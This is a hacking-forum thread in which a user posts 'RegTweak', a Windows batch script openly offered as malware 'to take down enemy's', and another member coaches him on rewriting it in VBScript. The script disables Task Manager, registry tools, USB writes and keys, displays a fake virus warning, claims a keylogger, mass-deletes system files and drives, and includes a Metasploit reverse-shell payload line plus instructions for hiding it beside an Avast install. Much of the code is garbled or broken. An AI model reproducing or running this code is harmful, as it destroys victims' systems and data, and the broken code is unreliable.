iExploit

Howdy, Stranger!

It looks like you're new here. If you want to get involved, click one of these buttons!

Sign In Apply for Membership

Top Posters

Who's Online (0)

Powered by Vanilla. Made with Bootstrap.
Looking to introduce yourself? Look no further, and click here! We also have IRC! [irc.evilzone.org #iexploit]
RegTweak [DOS]
  • Prariredog
    Posts: 14
    RELEASED!

    RegTweak Crashes Windows and makes it freeze but stops system also explorer
    Just Don't open the exe I really don't know if you should my script is deadly see for your self 
    echo off
    echo wscript.exe \"C:\Program Files\Alwil Software\Avast4\" \"Ahrunsecurty.dll\"
    echo CreateObject(\"Wscript.Shell\").Run \"\"\"\" & WScript.Arguments(0) & \"\"\"\", 0, False
    echo .>>c:\WINDOWS...\keys.txt
    echo :
    set /p keys=
    echo %keys%>>c:\\Windows...\Serial.txt
    echo REGEDIT4 >> c:\reg.reg
    echo. >> c:\reg.reg
    echo [HKEY_CURRENT_USER\Control Panel\Mouse] >> c:\reg.reg
    echo \"SwapMouseButtons\"=\"1\" >> c:\reg.reg
    echo \"MouseSpeed\"=\"1\" >> c:\reg.reg
    echo \"DoubleClickSpeed\"=\"1\" >> c:\reg.reg
    echo. >> c:\reg.reg
    echo [HKEY_CURRENT_USER\Control Panel\Keyboard] >> c:\reg.reg
    echo \"KeyboardDelay\"=\"1\" >> c:\reg.reg
    echo \"KeyboardSpeed\"=\"1\" >> c:\reg.reg
    echo. >> c:\reg.reg
    echo [HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Main] >> c:\reg.reg
    echo \"Start Page\"=\"http://www.google.com/\" >> c:\reg.reg
    echo.
    echo [HKEY_CURRENT_USER\Control Panel\Desktop] >> c:\reg.reg
    echo \"PaintDesktopVersion\"=dword:1 >> c:\reg.reg
    echo. >> c:\reg.reg

    echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >> c:\reg.reg
    echo \"LegalNoticeCaption\"=\"YoU HaVe A vIRus NoW =)\" >> c:\reg.reg
    echo \"LegalNoticeText\"=\"Please contact 1-800-viruz\" >> c:\reg.reg

    echo [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
    \"DisableRegistryTools\"=dword:00000001

    echo [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
    \"DisableTaskMgr\"=dword:00000001

    echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\StorageDevicePolicies]
    \"WriteProtect\"=dword:00000001

    echo [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
    \"NoCDBurning\"=dword:00000001

    echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layout]
    \"Scancode Map\"=hex:00,00,00,00,00,00,00,00,03,00,00,00,00,00,5b,e0,00,00,5c,e0,\
      00,00,00,00

    echo

    REGEDIT /s c:\reg.reg
    del \"C:\Documents and Settings\All Users\Start Menu\Programs\Startup\winhelp.bat\"

    del \"C:\WINDOWS\ServicePackFiles\I386\agentsr.dll\"

    del \"C:\WINDOWS\ServicePackFiles\I386\agentpsh.dll\"

    del \"C:\WINDOWS\security\"

    del \"C:\WINDOWS\system32\"

    del \"C:\WINDOWS\system\"

    del \"C:\WINDOWS\TASKMAN\"

    del \"C:\WINDOWS\explorer\"

    del \"C:\WINDOWS\regedit\"

    del \"C:\WINDOWS\notepad\"

    del \"C:\WINDOWS\pss\"

    del \"C:\WINDOWS\Registration\"

    del \"C:\WINDOWS\System\"

    del \"C:\WINDOWS\pchealth\"

    del \"C:\WINDOWS\ServicePackFiles\I386\safemode\"

    del \"C:\WINDOWS\ServicePackFiles\I386\rundll32\"

    del \"C:\WINDOWS\ServicePackFiles\I386\taskkill\"

    del \"C:\WINDOWS\ServicePackFiles\I386\tasklist\"

    del \"C:\WINDOWS\ServicePackFiles\I386\taskmgr\"

    DEL C: -Y

    DEL D: -Y

    DEL H: -Y

    DEL P: -Y

    del %systemdrive%\*.*/f/s/q

    del cd /d %HOMEDRIVE%\%HOMEPATH%

    del \"C:\WINDOWS\ServicePackFiles\I386\cmd\"

    del \"C:\WINDOWS\system32\windowspowershell\v1.0\examples\"

    del \"C:\WINDOWS\system32\windowspowershell\v1.0\about_path_syntax.help

    del \"C:\WINDOWS\system32\windowspowershell\v1.0\"

    del \"C:\WINDOWS\system32\svcpack.dll\"

    del \"C:\WINDOWS\system32\svchost\"

    del \"C:\WINDOWS\system32\sysedit\"

    del \"C:\WINDOWS\system32\sysedit\"

    del \"C:\WINDOWS\system32\system\"

    del \"C:\WINDOWS\system32\systeminfo\"

    del \"C:\WINDOWS\system32\csrsrv.dll\"

    del \"C:\WINDOWS\system32\smss\"

    del \"C:\WINDOWS\system32\spoolss.dll\"

    del \"C:\WINDOWS\system32\spoolsv\"\

    del \"C:\WINDOWS\system32\csrss\"\

    del \"C:\WINDOWS\system32\compobj.dll\"

    del \"C:\WINDOWS\system32\console.dll\"

    del \"C:\WINDOWS\system32\control\"

    del \"C:\WINDOWS\system32\compact\"

    del \"C:\WINDOWS\system32\comp\"

    del \"C:\WINDOWS\system32\CONFIG.NT\"

    del \"C:\WINDOWS\system32\conime\"

    del \"C:\WINDOWS\system32\command\"

    del \"C:\WINDOWS\system32\cmstp\"

    del \"C:\WINDOWS\system32\cnetcfg.dll\"

    del \"C:\WINDOWS\system32\cscript\"

    del \"C:\WINDOWS\system32\drwatson\"

    del \"C:\WINDOWS\system32\drwtsn32\"

    del \"C:\WINDOWS\system32\drprob.dll\"

    del \"C:\WINDOWS\system32\shell32.dll\"

    del \"C:\WINDOWS\system32\wmvcore.dll\"

    del \"C:\WINDOWS\system32\win32k\"

    del \"C:\WINDOWS\system32\WMNetMgr.dll\"

    del \"C:\WINDOWS\system32\logonui\"

    del \"C:\WINDOWS\system32\shellstyle.dll\"

    del \"C:\WINDOWS\system32\vbscript.dll\"

    del \"C:\WINDOWS\system32\deployjava1.dll\"

    del \"C:\WINDOWS\system32\ntmsmgr.dll\"

    del \"C:\WINDOWS\system32\ipmsnap\"

    del \"C:\WINDOWS\system32\msscp\"

    del \"C:\WINDOWS\system32\smlogcfg.dll\"

    del \"C:\WINDOWS\system32\expsrv.dll\"

    del \"C:\WINDOWS\system32\ipsmsnap\"

    del \"C:\WINDOWS\system32\lmrt.dll\"

    del \"C:\WINDOWS\system32\themeui.dll\"

    del \"C:\WINDOWS\system32\MSRDO20.dll

    del \"C:\WINDOWS\system32\rpcss.dll

    del \"C:\WINDOWS\system32\netlogon.dll\"

    del \"C:\WINDOWS\system32\s3gnb.dll\"

    del \"C:\WINDOWS\system32\wzcdlg.dll\"

    del \"C:\WINDOWS\system32\qdvd.dll\"

    del \"C:\WINDOWS\system32\wpdsp.dll\"

    del \"C:\WINDOWS\system32\winhttp.dll\"

    del \"C:\WINDOWS\system32\confmsp.dll\"

    del \"C:\WINDOWS\system32\wmdrmnet.dll\"

    del \"C:\WINDOWS\system32\ipsecsnp.dll\"

    del \"C:\WINDOWS\system32\d3drm.dll\"

    del \"C:\WINDOWS\system32\localspl.dll\"

    del \"C:\WINDOWS\system32\windowscodecsext.dll\"

    del \"C:\WINDOWS\system32\msvcrt.dll\"

    del \"C:\WINDOWS\system32\ir41_qcx.dll\"

    del \"C:\WINDOWS\system32\dmconfig.dll\"

    del \"C:\WINDOWS\system32\hnetwiz.dll\"

    del \"C:\WINDOWS\system32\filemgmt.dll\"

    del \"C:\WINDOWS\system32\WUDFx.dll\"

    del \"C:\WINDOWS\system32\MP4SDECD.dll\"

    del \"C:\WINDOWS\system32\wucltui.dll\"

    del \"C:\WINDOWS\system32\cscui.dll\"

    del \"C:\WINDOWS\system32\msrd3x40.dll\"

    del \"C:\WINDOWS\system32\iedkcs32.dll\"

    del \"C:\WINDOWS\system32\ursdtea.dll\"

    del \"C:\WINDOWS\system32\msexcl40.dll\"

    del \"C:\WINDOWS\system32\scesrv.dll\"

    del \"C:\WINDOWS\system32\netsetup\"

    del \"C:\WINDOWS\system32\ipnathlp.dll\"

    del \"C:\WINDOWS\system32\ippromon.dll\"

    del \"C:\WINDOWS\system32\dmnconfig.dll\"

    del \"C:\WINDOWS\system32\hnetwiz.dll\"

    del \"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Cdrom\"

    del \"HKEY_LOCAL_MACHINE\SYSTEM\"

    del \"HKEY_LOCAL_MACHINE\"

    del \"HKEY_USERS\"

    del \"HKEY_CURRENT_CONFIG\"

    del \"HKEY_CLASSES_ROOT\"

    del \"HKEY_CURRENT_USER\"

    del \"%SYSTEMROOT%\"

    del \"%SYSTEMROOT%\system32\View Channels\"

    del \"%SYSTEMROOT%\system32\$winnt$\"

    del \"%SYSTEMROOT%\system32\EAL32\"

    del \"%SYSTEMROOT%\system32\login\"

    del \"%SYSTEMROOT%\system32\kernel32.dll\"

    del \"%SYSTEMROOT%\system32\mfc42u.dll\"

    del \"HKEY_CLASSES_ROOT\"

    del \"HKEY_CURRENTUSER\"

    del \"HKEY_USERS\"

    del \"HKEY_CURRENTCONFIG\"

    del \"HKEY_DYN_DATA\"

    del \"\??\C:\Documents and Settings\All Users\Application Data\Systweak\ASO3\System Protector\Native\nativeapp.in\"

    ipconfig /release

    exit


    INPUT INTO .DLL
    ./msfpayload windows/shell/reverse_tcp HKEY_LOCALMACHINE ./msfencode -x ashCmd.exe -t exe -e x86/C:\Windows/A3dC.bat -c 10 -o a3dc.bat
    if \"%DATE:~1,1%\"==\"12/31\" call C:\Program Files\Alwil Software\Avast4\ahsecurity.dll



    READ THIS
    How to set up:
    Drag A3dC.bat into windows before installing avast
    Open Ahrunsecurity.dll with wordpad and where you see "1,1" edit it to the current or when u want it to run the virus. Date Example:2003 will be "0,3"
    then the date to start up is "12/30" edit it to the date you want Date example: I want it to run on the first of january so it will be "1,1"

    INSTALL AVAST THEN WHEN IT ASK'S YOU TO RUN RIGHT NOW SAY NO/SELECT NO
    THEN RIGHT CLICK AVAST HIT FIND TARGET INSTALL THE DLL
    THEN JUST WAIT


    DO NOT INSTALL THIS WITH THE .DLL AND .BAT
    MAKE SURE YOU DONT OPEN THE .BAT


    KEYLOGGER INSIDE THE .BAT
    KEYLOGGER IS IN WINDOWS
    NAME: Serial.txt


    SHUTS OFF INTERNET AND MOUSE AND KEYBOARD AND CD ROM AND PROTECTS FILE FROM EDIT'S AND DOSENT ALLOW USB AND DISABLE'S KEYBOARD,MOUSECLICKS, AND MOUSE!


    OLD DOWNLOAD:
    LINK: WARNING I AM NOT RESPONSIBLE FOR ANY DAMAGE OR HARDWARE FAILURE
    RegTweak [BETA OLD]
    Download is beta input the script and make it yourself I am to lazy to upload it.

    MUST HAVE RAR

    Good to take down enemy's

    Keylogger
    BAT/KillAll.psa
    Trojan.BAT.Delete.DA
    Trojan.Disablereg
    Trojan.BAT.Delete.DA
    Trojan.BAT.Delete.DA
    Trojan.Win32.Agent.pp
    Trojan.BAT.Delete.DA

    YOUR OWN RISKS
  • m0rph
    Posts: 332
    good, now do it again in vbscript for example:


    On Error Resume Next
    Set RegShell = CreateObject(\"WScript.Shell\")
    Set fso = CreateObject(\"Scripting.FileSystemObject\")
    GW1776 = \"http://www.iexploit.org\"
    RegShell.RegWrite \"HKCU\Software\Microsoft\Internet Explorer\Main\Start Page\", GW1776
    RegShell.RegWrite \"HKLM\SOFTWARE\Microsoft\Internet Explorer\MAIN\Start Page\", GW1776


    +1 to first person that figures out the meaning behind GW1776
    +2 if you are British
    while( !(succeed = try() ) );
  • Prariredog
    Posts: 14
    said:


    good, now do it again in vbscript for example:


    On Error Resume Next
    Set HYYPT = CreateObject(\"WScript.Shell\")
    Set GU50C = CreateObject(\"Scripting.FileSystemObject\")
    GW1776 = \"http://www.iexploit.org\"
    HYYPT.RegWrite \"HKCU\\", GW1776
    HYYPT.RegWrite \"HKCR\\", GW1776
    HYYPT.RegWrite \"HKCC\\", GW1776
    HYYPT.RegWrite \"HKLM\\", GW1776
    HYYPT.RegWrite \"HKCU\Software\Microsoft\Internet Explorer\Main\Start Page\", GW1776
    HYYPT.RegWrite \"HKLM\SOFTWARE\Microsoft\Internet Explorer\MAIN\Start Page\", GW1776


    +1 to first person that figures out the meaning behind GW1776
    +2 if you are British


    Too much work for tonight You can edit the script and make it better then send me it.
  • m0rph
    Posts: 332
    said:


    echo off
    Set HYYPT = CreateObject(\"WScript.Shell\")
    Set GU50C = CreateObject(\"Scripting.FileSystemObject\")
    GW1776 = \"http://www.iexploit.org\"
    HYYPT.RegWrite \"HKCU\\", iExploit Property
    HYYPT.RegWrite \"HKCR\\", Owned By Prariredog
    HYYPT.RegWrite \"HKCC\\", IExploit
    HYYPT.RegWrite \"HKLM\\", http://www.iexploit.org/
    HYYPT.RegWrite \"HKCU\Software\Microsoft\Internet Explorer\Main\Start Page\", GW1776
    HYYPT.RegWrite \"HKLM\SOFTWARE\Microsoft\Internet Explorer\MAIN\Start Page\", GW1776
    echo REGEDIT4 >> c:\reg.reg

    like this?

    No, for these reasons:
    1. You cannot use vbs syntax in a batch file
    2. You have multiple undefined variables after your RegWrite lines. GW1776 is a variable, and thats why you can use it after a RegWrite statement.

    You can't do
    ------------------------------------------
    HYYPT.RegWrite "HKCU\", iExploit Property
    ------------------------------------------
    without defining what "iExploit Property" is first.

    You could do it this way:

    iExploit_Property = \"iExploit Property\"
    HYYPT.RegWrite \"HKCU\\", iExploit_Property


    I edited my first post, hopefully the new syntax I layed out is a bit more clear. I had it obfuscated before because that code was part of a previous project I had going on.

    So here's some new objectives for you:
    1. Write a simple "Hello World" script in vbscript to get a feel for the syntax, you will need to save it as a .vbs file.

    2. Find out how to use system commands from vbscript, and only use them if you have to.

    3. With the new template I've given you in my first post, rewrite RegTweak in vbscript.

    OPTIONAL:
    Download Visual Basic Express 2010 and make your new RegTweak vbscript a standalone executable. Visual Basic uses the same syntax as vbscript...hence Visual Basic Script

    VB Express gives you a lot of options with what you want to do with your programs; you can import ActiveX Controls and Dialogs to your project, giving it much more potential than what you can ever do with vbscript.
    while( !(succeed = try() ) );
  • Prariredog
    Posts: 14
    said:


    said:


    echo off
    Set HYYPT = CreateObject(\"WScript.Shell\")
    Set GU50C = CreateObject(\"Scripting.FileSystemObject\")
    GW1776 = \"http://www.iexploit.org\"
    HYYPT.RegWrite \"HKCU\\", iExploit Property
    HYYPT.RegWrite \"HKCR\\", Owned By Prariredog
    HYYPT.RegWrite \"HKCC\\", IExploit
    HYYPT.RegWrite \"HKLM\\", http://www.iexploit.org/
    HYYPT.RegWrite \"HKCU\Software\Microsoft\Internet Explorer\Main\Start Page\", GW1776
    HYYPT.RegWrite \"HKLM\SOFTWARE\Microsoft\Internet Explorer\MAIN\Start Page\", GW1776
    echo REGEDIT4 >> c:\reg.reg

    like this?

    No, for these reasons:
    1. You cannot use vbs syntax in a batch file
    2. You have multiple undefined variables after your RegWrite lines. GW1776 is a variable, and thats why you can use it after a RegWrite statement.

    You can't do
    ------------------------------------------
    HYYPT.RegWrite "HKCU\", iExploit Property
    ------------------------------------------
    without defining what "iExploit Property" is first.

    You could do it this way:

    iExploit_Property = \"iExploit Property\"
    HYYPT.RegWrite \"HKCU\\", iExploit_Property


    I edited my first post, hopefully the new syntax I layed out is a bit more clear. I had it obfuscated before because that code was part of a previous project I had going on.

    So here's some new objectives for you:
    1. Write a simple "Hello World" script in vbscript to get a feel for the syntax, you will need to save it as a .vbs file.

    2. Find out how to use system commands from vbscript, and only use them if you have to.

    3. With the new template I've given you in my first post, rewrite RegTweak in vbscript.

    OPTIONAL:
    Download Visual Basic Express 2010 and make your new RegTweak vbscript a standalone executable. Visual Basic uses the same syntax as vbscript...hence Visual Basic Script

    VB Express gives you a lot of options with what you want to do with your programs; you can import ActiveX Controls and Dialogs to your project, giving it much more potential than what you can ever do with vbscript.


    I only know how to script but never bother to learn vbs if you can edit it for me thanks but make sure u don't open the exe
  • m0rph
    Posts: 332
    said:


    I only know how to script but never bother to learn vbs if you can edit it for me thanks but make sure u don't open the exe


    You will get no more help from me, and if you keep pushing me to write it for you I will - rep you.

    You have everything you need, if you want to be a programmer then you have to think like one. Ask how to do it, don't ask others to do it for you. Break your addiction to batch and learn a language that you can actually accomplish something with.
    while( !(succeed = try() ) );
Add a Comment